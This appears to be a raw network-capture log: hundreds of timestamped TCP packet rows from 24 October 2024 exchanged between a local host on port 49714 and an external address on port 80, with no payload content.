Oct 24, 2024 13:54:22.726560116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.726582050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.726594925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795285940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795351028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795403004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795450926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795458078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795495033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795501947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795537949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795547962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795582056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795592070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795615911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795622110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795651913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795664072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795684099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795732975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795743942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795797110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795821905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795829058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795850992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795886040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795919895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795936108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.795974970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.795999050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796010017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796010971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796066999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796066999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796112061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796120882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796156883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796185970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796195984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796222925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796226978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796260118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796272993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796291113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796302080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796324015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796325922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796359062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796391964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796402931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796426058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796432972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796463013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796471119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796503067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796509981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796536922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796545982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796571970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796577930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796605110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796614885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796639919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796644926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796675920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796680927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796710014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796716928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796747923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796751976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796786070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796801090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796818018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796828032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796858072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796875954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796932936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.796983957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.796983957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797033072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797039986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797075033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797125101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797128916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797163963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797178030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797198057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797197104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797233105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797274113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797280073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797290087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797334909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797343016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797396898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797430992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797445059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797465086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797466993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797498941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797518015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797553062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797583103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797595978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797624111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797635078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797671080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797678947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797712088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797722101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797759056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797760963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797792912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797827959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797837973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797861099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797871113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797897100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797925949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797945023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797960043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.797969103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.797996044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798010111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798029900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798063040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798070908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798096895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798105001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798134089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798167944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798181057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798202991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798202991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798234940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798259974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798268080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798269987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798302889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798335075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798336029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798347950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798369884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798372984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798403978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798434019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798434019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798472881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798475981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798506021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798511028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798538923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798549891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798574924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798590899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798610926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798614025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798654079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798763037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798798084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798811913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798845053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798854113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798907042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.798913002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798948050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.798949957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799000978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799036980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799046040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799069881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799105883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799110889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799140930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799174070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799189091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799207926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799243927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799254894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799288988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799295902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799350977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799382925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799402952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799422026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799422979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799463034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799474001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799510002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799511909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799550056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799593925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799602032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799638033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799649000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799671888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799705982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799716949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799743891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799761057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799783945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799803972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799856901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799892902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799904108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799937010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.799947023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799981117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.799990892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800014973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800021887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800052881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800080061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800129890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800132036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800168991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800199986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800204039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800236940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800271034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800287962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800303936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800313950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800338984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800374031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800385952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800405979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800426960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800462008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800467968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800496101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800502062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800533056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800539017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800571918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800575972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800611019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800623894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800672054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800681114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800707102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800710917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800738096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800746918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800772905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800807953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800822020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800839901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800863028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800918102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.800966024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.800971031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801023006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801026106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801079035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801111937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801127911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801141024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801173925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801186085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801208973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801212072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801244974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801248074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801281929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801322937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801332951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801354885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801390886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801399946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801425934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801438093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801459074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801464081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801492929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801500082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801522970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801554918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801575899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801589966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801589966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801624060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801652908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801660061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801673889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801693916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801727057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801738977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801758051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801793098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801798105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801829100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801832914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801862955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801867962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801898003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801907063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.801933050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801968098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.801974058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802001953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802037954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802042007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802073002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802078962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802109003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802124023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802143097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802154064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802177906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802186012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802212954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802221060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802247047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802252054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802282095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802289963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802318096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802318096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802354097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802359104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802387953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802392960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802423000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802428961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802458048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802467108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802488089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802499056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802521944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802529097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.802556992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.802598000 CEST	49714	80	192.168.2.6	95.182.96.50
